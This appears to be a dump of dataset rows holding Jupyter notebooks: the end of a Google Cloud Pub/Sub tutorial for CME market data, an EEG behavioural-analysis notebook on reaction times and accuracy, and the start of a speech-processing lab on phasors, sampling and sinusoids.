is 10s.\n )\n print ('Created Subscriptions in Project \\n')\n\n\n print ('Listing Subscriptions in Your Project %s : ' % os.getenv('GOOGLE_CLOUD_PROJECT'))\n for subscription in subscriber.list_subscriptions(subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])):\n print('\\t', subscription.name)\n\n\n\nexcept:\n e = sys.exc_info()[1]\n print( \"Error: %s \\n\" % e )\n", "Created Subscriptions in Project \n\nListing Subscriptions in Your Project prefab-rampart-794 : \n\t projects/prefab-rampart-794/subscriptions/ALEXDEMO_CERT.SSCL.GCP.MD.RT.CMEG.FIXBIN.v01000.INCR.310\n" ] ], [ [ "## Subscription View in Google Cloud Console\n\nSubscriptions are also avaliable for viewing in Google Cloud Console (https://console.cloud.google.com/). Navigate to Cloud Pub/Sub and click Subscription. If you click your Subscription Name, it will open up the details about that Subscription. You can see the all queued messages and core settings which are set to default settings as we did not specify special settings and the functions above used the defaults. \n\nAnother thing shown in this view is the total queued messages from GCP in the Subscription.\n", "_____no_output_____" ], [ "## Pull a Single Message from CME \n\nThe following will do a simple message pull from your Subscription and print it out locally. There are extensive examples on data pulling from a Subscription including batch and async (https://cloud.google.com/pubsub/docs/pull). \n\n", "_____no_output_____" ] ], [ [ "#Pull 1 Message\nprint ('Pulling a Single Message and Displaying:')\n\nCME_DATA = subscriber.pull(subscription_name, max_messages=1)\n\n#Print that Message\nprint (CME_DATA)\n", "Pulling a Single Message and Displaying:\nreceived_messages {\n ack_id: \"TgQhIT4wPkVTRFAGFixdRkhRNxkIaFEOT14jPzUgKEURAQgUBXx9cUFPdVVeGgdRDRlyfGcjbAkXUgRGVnlVWRENem1cVzhYDxl7e2F2bl4VAwpHUn13wszCqPLBIR1tNY2h8KFASony3-N2Zho9XxJLLD5-PT1FQV5AEkw2CERJUytDCypYEQ\"\n message {\n data: \":|\\027\\000\\353\\336\\260\\266\\260n\\346\\025@\\000\\013\\000/\\000\\001\\000\\t\\000\\257\\266\\220\\266\\260n\\346\\025\\204\\000\\000(\\000\\001\\331\\376\\304\\022\\017\\000\\000\\000\\211E\\303$\\000\\000\\000\\000\\000j\\317\\245>\\'\\001\\000\\003\\000\\000\\000K)\\000\\000\\0001\\000\\000\\000\\000\\000\\000\"\n attributes {\n key: \"Channel\"\n value: \"310\"\n }\n attributes {\n key: \"MsgSeqNum\"\n value: \"1539130\"\n }\n attributes {\n key: \"SendingTime\"\n value: \"1578070424712\"\n }\n message_id: \"920960344628213\"\n publish_time {\n seconds: 1578070424\n nanos: 736000000\n }\n }\n}\n\n" ] ], [ [ "# Delete Subscriptions\n\nYou can also use the Python SDK to delete your Cloud Pub/Sub Subscriptions. The following will attempt to delete ALL the subscriptions in your Project. \n", "_____no_output_____" ] ], [ [ "#List Subscriptions in My Project / Delete Subscription\ndelete = True\n\nsubscriber = pubsub_v1.SubscriberClient()\nproject_path = subscriber.project_path(os.environ['GOOGLE_CLOUD_PROJECT'])\n\nif not delete: \n\n print ('Did you mean to Delete all Subscriptions? If yes, then set delete = True')\n\nfor subscription in subscriber.list_subscriptions(project_path): \n #Delete Subscriptions\n if delete: \n subscriber.delete_subscription(subscription.name)\n print (\"\\tDeleted: {}\".format(subscription.name))\n else:\n print(\"\\tActive Subscription: {}\".format(subscription.name))", "/anaconda3/envs/python3/lib/python3.7/site-packages/google/auth/_default.py:66: UserWarning: Your application has authenticated using end user credentials from Google Cloud SDK. We recommend that most server applications use service accounts instead. If your application continues to use end user credentials from Cloud SDK, you might receive a \"quota exceeded\" or \"API not enabled\" error. For more information about service accounts, see https://cloud.google.com/docs/authentication/\n warnings.warn(_CLOUD_SDK_CREDENTIALS_WARNING)\n" ] ], [ [ "# Summary\n\nThis notebook went through the bare minimum needed to create a Cloud Pub/Sub Subscription against the CME Smart Stream on GCP solutions. \n\n\n\n\n\n# Questions?\n\nIf you have questions or think we can update this to additional use cases, please use the Issues feature in Github or reach out to CME Sales team at [email protected]\n\n\n", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1f26e93ea73015ce32714e647c951246b74773
289,455
ipynb
Jupyter Notebook
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
1
2021-01-30T22:11:34.000Z
2021-01-30T22:11:34.000Z
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
null
null
null
.ipynb_checkpoints/BHV01_ratings_prelim_analysis-checkpoint.ipynb
hoycw/PRJ_Error_eeg
6f6b01881dc6072a6616345382b0f0110ba75b11
[ "MIT" ]
1
2020-12-26T20:49:51.000Z
2020-12-26T20:49:51.000Z
388.530201
42,718
0.923619
[ [ [ "from __future__ import division\n%matplotlib inline\nimport sys \nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport scipy.io as io\nimport pickle\n\nimport scipy.stats", ":0: FutureWarning: IPython widgets are experimental and may change in the future.\n" ], [ "SBJ = 'colin_test2'", "_____no_output_____" ], [ "prj_dir = '/Volumes/hoycw_clust/PRJ_Error_eeg/'#'/Users/sheilasteiner/Desktop/Knight_Lab/PRJ_Error_eeg/'\nresults_dir = prj_dir+'results/'\nfig_type = '.png'\ndata_dir = prj_dir+'data/'\nsbj_dir = data_dir+SBJ+'/'", "_____no_output_____" ] ], [ [ "### Load paradigm parameters", "_____no_output_____" ] ], [ [ "prdm_fname = os.path.join(sbj_dir,'03_events',SBJ+'_prdm_vars.pkl')\nwith open(prdm_fname, 'rb') as f:\n prdm = pickle.load(f)", "_____no_output_____" ] ], [ [ "### Load Log Info", "_____no_output_____" ] ], [ [ "behav_fname = os.path.join(sbj_dir,'03_events',SBJ+'_behav.csv')\ndata = pd.read_csv(behav_fname)", "_____no_output_____" ], [ "# Remove second set of training trials in restarted runs (EEG12, EEG24, EEG25)\nif len(data[(data['Trial']==0) & (data['Block']==-1)])>1:\n train_start_ix = data[(data['Trial']==0) & (data['Block']==-1)].index\n train_ix = [ix for ix in data.index if data.loc[ix,'Block']==-1]\n later_ix = [ix for ix in data.index if ix >= train_start_ix[1]]\n data = data.drop(set(later_ix).intersection(train_ix))\n data = data.reset_index()", "_____no_output_____" ], [ "# Change block numbers on EEG12 to not overlap\nif SBJ=='EEG12':\n b4_start_ix = data[(data['Trial']==0) & (data['Block']==4)].index\n for ix in range(b4_start_ix[1]):\n if data.loc[ix,'Block']!=-1:\n data.loc[ix,'Block'] = data.loc[ix,'Block']-4", "_____no_output_____" ], [ "# Label post-correct (PC), post-error (PE) trials\ndata['PE'] = [False for _ in range(len(data))]\nfor ix in range(len(data)):\n # Exclude training data and first trial of the block\n if (data.loc[ix,'Block']!=-1) and (data.loc[ix,'Trial']!=0):\n if data.loc[ix-1,'Hit']==0:\n data.loc[ix,'PE'] = True", "_____no_output_____" ], [ "# pd.set_option('max_rows', 75)\n# data[data['Block']==3]", "_____no_output_____" ] ], [ [ "# Add specific analysis computations", "_____no_output_____" ] ], [ [ "# Find middle of blocks to plot accuracy\nblock_start_ix = data[data['Trial']==0].index\nif SBJ=='EP11':#deal with missing BT_T0\n block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix]\nelse:\n block_mid_ix = [ix+prdm['n_trials']/2 for ix in block_start_ix[1:]]\n\n# Add in full_vis + E/H training: 0:4 + 5:19 = 10; 20:34 = 27.5 \nblock_mid_ix.insert(0,np.mean([prdm['n_examples']+prdm['n_training'],\n prdm['n_examples']+2*prdm['n_training']])) #examples\nblock_mid_ix.insert(0,np.mean([0, prdm['n_examples']+prdm['n_training']]))\n#easy training (would be 12.5 if splitting examples/train)", "_____no_output_____" ], [ "# Compute accuracy per block\naccuracy = data['Hit'].groupby([data['Block'],data['Condition']]).mean()\nacc_ITI = data['Hit'].groupby([data['ITI type'],data['Condition']]).mean()\nfor ix in range(len(data)):\n data.loc[ix,'Accuracy'] = accuracy[data.loc[ix,'Block'],data.loc[ix,'Condition']]\n data.loc[ix,'Acc_ITI'] = acc_ITI[data.loc[ix,'ITI type'],data.loc[ix,'Condition']]", "_____no_output_____" ], [ "# Break down by post-long and post-short trials\ndata['postlong'] = [False if ix==0 else True if data['RT'].iloc[ix-1]>1 else False for ix in range(len(data))]\n\n# Compute change in RT\ndata['dRT'] = [0 for ix in range(len(data))]\nfor ix in range(len(data)-1):\n data.loc[ix+1,'dRT'] = data.loc[ix+1,'RT']-data.loc[ix,'RT']", "_____no_output_____" ], [ "# Grab rating data to plot\nrating_trial_idx = [True if rating != -1 else False for rating in data['Rating']]\nrating_data = data['Rating'][rating_trial_idx]", "_____no_output_____" ] ], [ [ "# Plot Full Behavior Across Dataset", "_____no_output_____" ] ], [ [ "# Accuracy, Ratings, and Tolerance\nf, ax1 = plt.subplots()\nx = range(len(data))\nplot_title = '{0} Tolerance and Accuracy: easy={1:0.3f}; hard={2:0.3f}'.format(\n SBJ, data[data['Condition']=='easy']['Hit'].mean(),\n data[data['Condition']=='hard']['Hit'].mean())\n \ncolors = {'easy': [0.5, 0.5, 0.5],#[c/255 for c in [77,175,74]],\n 'hard': [1, 1, 1],#[c/255 for c in [228,26,28]],\n 'accuracy': 'k'}#[c/255 for c in [55,126,184]]}\nscat_colors = {'easy': [1,1,1],#[c/255 for c in [77,175,74]],\n 'hard': [0,0,0]}\naccuracy_colors = [scat_colors[accuracy.index[ix][1]] for ix in range(len(accuracy))]\n#scale = {'Hit Total': np.max(data['Tolerance'])/np.max(data['Hit Total']),\n# 'Score Total': np.max(data['Tolerance'])/np.max(data['Score Total'])}\n\n# Plot Tolerance Over Time\nax1.plot(data['Tolerance'],'b',label='Tolerance')\nax1.plot(x,[prdm['tol_lim'][0] for _ in x],'b--')\nax1.plot(x,[prdm['tol_lim'][1] for _ in x],'b--')\nax1.set_ylabel('Target Tolerance (s)', color='b')\nax1.tick_params('y', colors='b')\nax1.set_xlim([0,len(data)])\nax1.set_ylim([0, 0.41])\nax1.set_facecolor('white')\nax1.grid(False)\n\n# Plot Accuracy per Block\nax2 = ax1.twinx()\n# ax2.plot(data['Hit Total']/np.max(data['Hit Total']),'k',label='Hit Total')\nax2.fill_between(x, 1, 0, where=data['Condition']=='easy',\n facecolor=colors['easy'], alpha=0.3)#, label='hard')\nax2.fill_between(x, 1, 0, where=data['Condition']=='hard',\n facecolor=colors['hard'], alpha=0.3)#, label='easy')\nax2.scatter(block_mid_ix, accuracy, s=50, c=accuracy_colors,\n edgecolors='k', linewidths=1)#colors['accuracy'])#,linewidths=2)\nax2.scatter(rating_data.index.values, rating_data.values/100, s=25, c=[1, 0, 0])\nax2.set_ylabel('Accuracy', color=colors['accuracy'])\nax2.tick_params('y', colors=colors['accuracy'])\nax2.set_xlabel('Trials')\nax2.set_xlim([0,len(data)])\nax2.set_ylim([0, 1])\nax2.set_facecolor('white')\nax2.grid(False)\n\nplt.title(plot_title)\n\nplt.savefig(results_dir+'BHV/ratings_tolerance/'+SBJ+'_tolerance'+fig_type)", "_____no_output_____" ] ], [ [ "# Plot only real data (exclude examples + training)", "_____no_output_____" ] ], [ [ "data_all = data\n# Exclude: Training/Examples, non-responses, first trial of each block\nif data[data['RT']<0].shape[0]>0:\n print 'WARNING: '+str(data[data['RT']<0].shape[0])+' trials with no response!'\ndata = data[(data['Block']!=-1) & (data['RT']>0) & (data['ITI']>0)]", "_____no_output_____" ] ], [ [ "## Histogram of ITIs", "_____no_output_____" ] ], [ [ "# ITI Histogram\nf,axes = plt.subplots(1,2)\nbins = np.arange(0,1.1,0.01)\nhist_real = sns.distplot(data['ITI'],bins=bins,kde=False,label=SBJ,ax=axes[0])\nhist_adj = sns.distplot(data['ITI type'],bins=bins,kde=False,label=SBJ,ax=axes[1])\naxes[0].set_xlim([0, 1.1])\naxes[1].set_xlim([0, 1.1])\nplt.subplots_adjust(top=0.93)\nf.suptitle(SBJ)\nplt.savefig(results_dir+'BHV/ITIs/'+SBJ+'_ITI_hist'+fig_type)", "_____no_output_____" ] ], [ [ "## Histogram of all RTs", "_____no_output_____" ] ], [ [ "# RT Histogram\nf,ax = plt.subplots()\nhist = sns.distplot(data['RT'],label=SBJ)\nplt.subplots_adjust(top=0.9)\nhist.legend() # can also get the figure from plt.gcf()\nplt.savefig(results_dir+'BHV/RTs/histograms/'+SBJ+'_RT_hist'+fig_type)", "_____no_output_____" ] ], [ [ "## RT Histograms by ITI", "_____no_output_____" ] ], [ [ "# ANOVA for RT differences across ITI\nitis = np.unique(data['ITI type'])\nif len(prdm['ITIs'])==4:\n f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values,\n data.loc[data['ITI type']==itis[2],('RT')].values,\n data.loc[data['ITI type']==itis[3],('RT')].values)\nelif len(prdm['ITIs'])==3:\n f,iti_p = scipy.stats.f_oneway(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values,\n data.loc[data['ITI type']==itis[2],('RT')].values)\nelif len(prdm['ITIs'])==2:\n f,iti_p = scipy.stats.ttest_ind(data.loc[data['ITI type']==itis[0],('RT')].values,\n data.loc[data['ITI type']==itis[1],('RT')].values)\nelse:\n print 'WARNING: some weird paradigm version without 2, 3, or 4 ITIs!'\n# print f, p", "7.50997664622 7.38855835564e-05\n" ], [ "f, axes = plt.subplots(1,2)\n\n# RT Histogram\nrt_bins = np.arange(0.7,1.3,0.01)\nfor iti in itis:\n sns.distplot(data['RT'].loc[data['ITI type'] == iti],bins=rt_bins,label=str(round(iti,2)),ax=axes[0])\naxes[0].legend() # can also get the figure from plt.gcf()\naxes[0].set_xlim(min(rt_bins),max(rt_bins))\n\n# Factor Plot\nsns.boxplot(data=data,x='ITI type',y='RT',hue='ITI type',ax=axes[1])\n\n# Add overall title\nplt.subplots_adjust(top=0.9,wspace=0.3)\nf.suptitle(SBJ+' RT by ITI (p='+str(round(iti_p,4))+')') # can also get the figure from plt.gcf()\n\n# Save plot\nplt.savefig(results_dir+'BHV/RTs/hist_ITI/'+SBJ+'_RT_ITI_hist_box'+fig_type)", "_____no_output_____" ] ], [ [ "## RT adjustment after being short vs. long", "_____no_output_____" ] ], [ [ "# t test for RT differences across ITI\nitis = np.unique(data['ITI type'])\nf,postlong_p = scipy.stats.ttest_ind(data.loc[data['postlong']==True,('dRT')].values,\n data.loc[data['postlong']==False,('dRT')].values)", "_____no_output_____" ], [ "f, axes = plt.subplots(1,2)\n\n# RT Histogram\ndrt_bins = np.arange(-0.6,0.6,0.025)\nsns.distplot(data['dRT'].loc[data['postlong']==True],bins=drt_bins,label='Post-Long',ax=axes[0])\nsns.distplot(data['dRT'].loc[data['postlong']==False],bins=drt_bins,label='Post-Short',ax=axes[0])\naxes[0].legend() # can also get the figure from plt.gcf()\naxes[0].set_xlim(min(drt_bins),max(drt_bins))\n\n# Factor Plot\nsns.boxplot(data=data,x='postlong',y='dRT',hue='postlong',ax=axes[1])\n\n# Add overall title\nplt.subplots_adjust(top=0.9,wspace=0.3)\nf.suptitle(SBJ+' RT by ITI (p='+str(round(postlong_p,6))+')') # can also get the figure from plt.gcf()\n\n# Save plot\nplt.savefig(results_dir+'BHV/RTs/hist_dRT/'+SBJ+'_dRT_postlong_hist_box'+fig_type)", "_____no_output_____" ] ], [ [ "##RT and Accuracy Effects by ITI and across post-error", "_____no_output_____" ] ], [ [ "# RTs by condition\n# if len(prdm_params['ITIs'])==4: # target_time v1.8.5+\n# data['ITI type'] = ['short' if data['ITI'][ix]<0.5 else 'long' for ix in range(len(data))]\n# ITI_plot_order = ['short','long']\n# elif len(prdm_params['ITIs'])==3: # target_time v1.8.4 and below\n# data['ITI type'] = ['short' if data['ITI'][ix]<prdm_params['ITI_bounds'][0] else 'long' \\\n# if data['ITI'][ix]>prdm_params['ITI_bounds'][1] else 'medium'\\\n# for ix in range(len(data))]\n# ITI_plot_order = ['short','medium','long']\n# else: # Errors for anything besides len(ITIs)==3,4\n# assert len(prdm_params['ITIs'])==4\n\nplot = sns.factorplot(data=data,x='ITI type',y='dRT',hue='PE',col='Condition',kind='point',\n ci=95);#,order=ITI_plot_order\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()\n\nplt.savefig(results_dir+'BHV/RTs/hist_PE_ITI/'+SBJ+'_RT_PE_ITI_hit'+fig_type)", "_____no_output_____" ], [ "# WARNING: I would need to go across subjects to get variance in accuracy by ITI\nplot = sns.factorplot(data=data,x='ITI type',y='Acc_ITI',col='Condition',kind='point',sharey=False,\n ci=95);#,order=ITI_plot_order\n#plot.set(alpha=0.5)\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()\n\nplt.savefig(results_dir+'BHV/accuracy/'+SBJ+'_acc_ITI'+fig_type)", "_____no_output_____" ] ], [ [ "## Look for behavioral adjustments following short and long responses", "_____no_output_____" ] ], [ [ "plot = sns.factorplot(data=data_PL,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',\n ci=95,order=prdm['ITIs']);\nplt.subplots_adjust(top=0.9)\nplot.fig.suptitle(SBJ+'_post-long') # can also get the figure from plt.gcf()\n\n# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)\nplot2 = sns.factorplot(data=data_PS,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',\n ci=95,order=prdm['ITIs']);\nplt.subplots_adjust(top=0.9)\nplot2.fig.suptitle(SBJ+'_post-short') # can also get the figure from plt.gcf()\n\n# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ] ]
cb1f3718662b2f53810a11c2b0c9a48b824794f2
33,019
ipynb
Jupyter Notebook
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
19
2020-09-20T17:01:53.000Z
2021-12-15T18:24:06.000Z
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
null
null
null
signals/signals-lab-1/signals-1-2-sampling-sinusoids.ipynb
laic/uoe_speech_processing_course
7cbc0424e87a8a98fd92fb664c9c156c83323f78
[ "MIT" ]
10
2020-09-25T08:09:50.000Z
2021-09-14T03:28:01.000Z
46.968706
721
0.631576
[ [ [ "#### _Speech Processing Labs 2021: SIGNALS 1: Digital Signals: Sampling and Superposition_", "_____no_output_____" ] ], [ [ "## Run this first!\n%matplotlib inline\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport cmath\nfrom matplotlib.animation import FuncAnimation\nfrom IPython.display import HTML\nplt.style.use('ggplot')\n\nfrom dspMisc import *", "_____no_output_____" ] ], [ [ " \n# Digital Signals: Sampling and Superposition\n\n### Learning Outcomes\n* Understand how we can approximate a sine wave with a specific frequency, given a specific sampling rate\n* Understand how sampling rate limits the frequencies of sinusoids we can describe with discrete sequences\n* Explain when aliasing will occurr and how this relates the sampling rate and the Nyquist frequency.\n* Observe how compound waveforms can be described as a linear combination of phasors ('superposition')\n\n### Background\n* Topic Videos: Digital Signal, Short Term Analysis, Series Expansion\n* [Interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)\n\n#### Extra background (extension material)\n* [Phasors, complex numbers and sinusoids](./signals-1-2a-digital-signals-complex-numbers.ipynb)\n", "_____no_output_____" ], [ "## 1 Introduction\n\nIn the class videos, you've seen that sound waves are changes in air pressure (amplitude) over time. In the notebook [interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb), we saw that we can \ndecompose complex sound waves into 'pure tone' frequency components. We also saw that the output of the DFT was actually a sequence of complex numbers! In this notebook, we'll give a bit more background on the relationship \nbetween complex numbers and sinusoids, and why it's useful to characterise sinusoids in the complex plane. ", "_____no_output_____" ], [ "## 2 Phasors and Sinusoids: tl;dr\n\nAt this point, I should say that you can get a conceptual understanding of digital signal processing concepts without going through _all_ the math. We certainly won't be examining your knowledge of complex numbers or geometry in this class. Of course, if you want to go further in understanding digital signal processing then you will have to learn a bit more about complex numbers, algebra, calculus and geometry than we'll touch upon here.\n\nHowever, right now the main point that we'd like you to take away from this notebook is that we can conveniently represent periodic functions, like sine waves, in terms of **phasors**: basically what shown on the left hand side of the following gif:\n\n![Phasor to sine wave gif](../fig/phasor.gif)\n\nYou can think of the **phasor as an analogue clockface** with one moving hand. On the right hand side is one period of a 'pure tone' sinusoid, sin(t). \n\nNow, we can think of every movement of the 'clockhand' (the phasor is actually this **vector**) as a step in time on the sinusoid graph: at every time step, the phasor (i.e., clockhand) rotates by some angle. If you follow the blue dots on both graphs, you should be able to see that the amplitude of the sinusoid matches the height of the clockhand on the phasor at each time step. \n\nThis gives us a different way of viewing the periodicity of $\\sin(t)$. The sinusoid starts to repeat itself when the phasor has done one full circle. So, rather than drawing out an infinite time vs amplitude graph, we can capture the behaviour of this periodic function in terms rotations with respect to this finite circle. \n\nSo, what's the connection with complex numbers? Well, that blue dot on the phasor actually represents a complex number, and the dimensions of that graph are actually the **real** (horizontal) and **imaginary** (vertical) parts of that number. That is, a complex number of the form $a + jb$, where $a$ is the real part and $b$ is the imaginary part. Quite conveniently, we can also express complex numbers in terms of a **magnitude** or radius $r$ (length of the clockhand) and a **phase angle** $\\theta$ (angle of rotation from the point (1,0)) and an exponential. So, we can write each point that the phasor hits in the form $re^{j\\theta}$. This will be familiar if you've had a look at the DFT formulae. \n\nThis relationship with complex numbers basically allows us to describe complicated periodic waveforms in terms of combinations of 'pure tone' sinusoids. It turns out that maths for this works very elegantly using the phasor/complex number based representation. \n\nThe basic things you need to know are:\n\n* A **sinusoid** (time vs amplitude, i.e. in the **time domain**) can be described in terms of a vector rotating around a circle (i.e. a phasor in the complex plane)\n* The **phasor** vector (i.e., 'clockhand') is described by a complex number $re^{j\\theta}$\n* $re^{j\\theta}$ is a point on a circle centered at (0,0) with radius $r$, $\\theta$ degrees rotated from $(r,0)$ on the 2D plane. \n * the **magnitude** $r$ tells us what the peak amplitude of the corresponding sine wave is\n * the **phase angle** $\\theta$ tells us how far around the circle the phasor has gone:\n * zero degrees (0 radians) corresponds to the point (r,0), while 90 degrees ($\\pi/2$ radians) corresponds to the point (0,r)\n* The vertical projection of the vector (onto the y-axis) corresponds to the amplitude of a **sine wave** $\\sin(\\theta)$ \n* The horizontal projection of the vector (onto the x-axis) corresponds to the amplitude of a **cosine wave** $\\cos(\\theta)$ \n* The **period** of these sine and cosine waves is the same as the time it takes to make one full circle of the phasor (in seconds). As such the **frequency** of the sine and cosine waves is the same as the frequency with which the phasor makes a full cycle (in cycles/second = Hertz). \n\nIf you take the maths on faith, you can see all of this just from the gif above. You'll probably notice in most phonetics text books, if they show this at all, they will just show the rotating phasor without any of the details. \n\nIf you want to know more about how this works, you can find a quick tour of these concepts in the (extension) notebook on [complex numbers and sinusoids](./sp-m1-2-digital-signals-complex-numbers). But it's fine if you don't get all the details right now. In fact, if you get the intuition behind from the phasor/sinusoid relationship above, it's fine to move on now to the rest of the content in this notebook. ", "_____no_output_____" ], [ "## Changing the frequency of a sinusoid\n\nSo, we think of sine (and cosine) waves in terms of taking steps around a circle in the 2D (complex) plane. Each of these 'steps' was represented by a complex number, $re^{j\\theta}$ (the phasor) where the magnitude $r$ tells you the radius of the circle, and the phase angle $\\theta$ tells you how far around the circle you are. When $\\theta = 0$, means you are at the point (r,0), while $\\theta = 90$ degrees means you are at the point (0,r). There are 360 degrees (or 2$\\pi$ radians) makes a complete cycle, i.e. when $\\theta = 360$ degrees, you end up back at (r,0).\n\n<div class=\"alert alert-success\">\n It's often easier to deal with angles measured in <strong>radians</strong> rather than <strong>degrees</strong>. The main thing to note is that:\n $$2\\pi \\text{ radians} = 360 \\text{ degrees, i.e. 1 full circle }$$\nAgain, it may not seem obvious why we should want to use radians instead of the more familiar degrees. The reason is that it makes dividing up a circle really nice and neat and so ends up making calculations much easier in the long run!\n</div>\n\nSo that describes a generic sinusoid, e.g. $\\sin(\\theta)$, but now you might ask yourself how do we generate a generate a sine wave with a specific frequency $f$ Herzt (Hz=cycles/second)? \n\nLet's take a concrete example, if we want a sinusoid with a frequency of $f=10$ Hz, that means:\n* **Frequency:** we need to complete 10 full circles of the phasor in 1 second. \n* **Period:** So, we have to complete 1 full cycle every 1/10 seconds (i.e. the period of this sinusoid $T=0.1$ seconds). \n* **Angular velocity:** So, the phasor has to rotate at a speed of $2\\pi/0.1 = 20\\pi$ radians per second\n\nSo if we take $t$ to represent time, a sine wave with frequency 10 Hz has the form $\\sin(20\\pi t)$\n* Check: at $t=0.1$ seconds we have $\\sin(20 \\times \\pi \\times 0.1) = \\sin(2\\pi)$, one full cycle. \n* This corresponds to the phasor $e^{20\\pi t j}$, where $t$ represents some point in time. \n\nIn general:\n* A sine wave with peak amplitude R and frequency $f$ Hz is expressed as $R\\sin(2 \\pi f t)$\n * The amplitude of this sine wave at time $t$ corresponds to the imaginary part of the phasor $Re^{2\\pi ftj}$. \n* A cosine wave with peak amplitude R and frequency $f$ Hz is expressed as $\\cos (2 \\pi f t$)\n * The amplitude of this cosine wave at time $t$ corresponds to the real part of the phasor $Re^{2\\pi ftj}$. \n\n\nThe term $2\\pi f$ corresponds to the angular velocity, often written as $\\omega$ which is measured in radians per second.\n\n\n\n\n", "_____no_output_____" ], [ "### Exercise\nQ: What's the frequency of $\\sin(2\\pi t)$? \n", "_____no_output_____" ], [ "## Frequency and Sampling Rate\n\nThe representation above assumes we're dealing with a continuous sinusoid, but since we're dealing with computers we need to think about digital (i.e. discrete) representations of waveforms. \nSo if we want to analyze a wave, we also need to sample it at a specific **sampling rate**, $f_s$. \n\nFor a given sampling rate $f_s$ (samples/second) we can work out the time between each sample, the **sampling period** as:\n\n$$ t_s = \\frac{1}{f_s}$$ \n\nThe units of $t_s$ is seconds/sample. That means that if we want a phasor to complete $f$ cycles/second, the angle between each sampled $\\theta_s$ step will need to be a certain size in order to complete a full cycle every $t_s$ seconds. \n\nThe units here help us figure this out: the desired frequency $f$ has units cycles/second. So, we can calculate what fraction of a complete cycle we need to take with each sample by multiplying $f$ with the sampling time $t_s$. \n* $c_s = ft_s$. \n* cycles/sample = cycles/second x seconds/sample \n\nWe know each cycle is $2\\pi$ radians (360 degrees), so we can then convert $c_s$ to an angle as follows: \n* $ \\theta_s = 2 \\pi c_s $\n", "_____no_output_____" ], [ "### Exercise\n\nQ: Calculate the period $t_s$ and angle $\\theta_s$ between samples for a sine wave with frequency $f=8$ Hz and sampling rate of $f_s=64$ \n", "_____no_output_____" ], [ "### Notes", "_____no_output_____" ], [ "### Setting the Phasor Frequency\n\nI've written a function `gen_phasors_vals_freq` that calculates the complex phasor values (`zs`), angles (`thetas`) and time steps (`tsteps`) for a phasor with a given frequency `freq` over a given time period (`Tmin` to `Tmax`). In the following we'll use this to plot how changes in the phasor relate to changes in the corresponding sinusoid given a specific sampling rate (`sampling_rate`). ", "_____no_output_____" ], [ "#### Example: \n\nLet's look at a phasor and corresponding sine wave with frequency $f=2$ Hz (`freq`), given a sampling rate of $f_s=16$ (`sampling_rate`) over 4 seconds. ", "_____no_output_____" ] ], [ [ "## Our parameters:\nTmin = 0\nTmax = 4\n\nfreq = 2 # cycles/second\nsampling_rate = 16 # i.e, f_s above\nt_step=1/sampling_rate # i.e., t_s above", "_____no_output_____" ], [ "## Get our complex values corresponding to the phasor with frequency freq\nzs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)\n\n## Project to real and imaginary parts for plotting\nXs = np.real(zs)\nYs = np.imag(zs)\n\n\n## generate the background for the plot: a phasor diagram on the left, a time v amplitude graph on the right\nfig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)\n\n## the phasor is plotted on the left on the left with a circle with radius 1 for reference\nphasor.set_xlabel(\"Real values\")\nphasor.set_ylabel(\"Imaginary values\")\n# plot the points the phasor will \"step on\"\nphasor.scatter(Xs, Ys)\n\n## Plot our actual sampled sine wave in magenta on the right\nsinusoid.plot(tsteps, Ys, 'o', color='magenta')\nsinusoid.set_xlabel(\"Time (s)\")\nsinusoid.set_ylabel(\"Amplitude\")", "_____no_output_____" ] ], [ [ "You should see two graphs above:\n* On 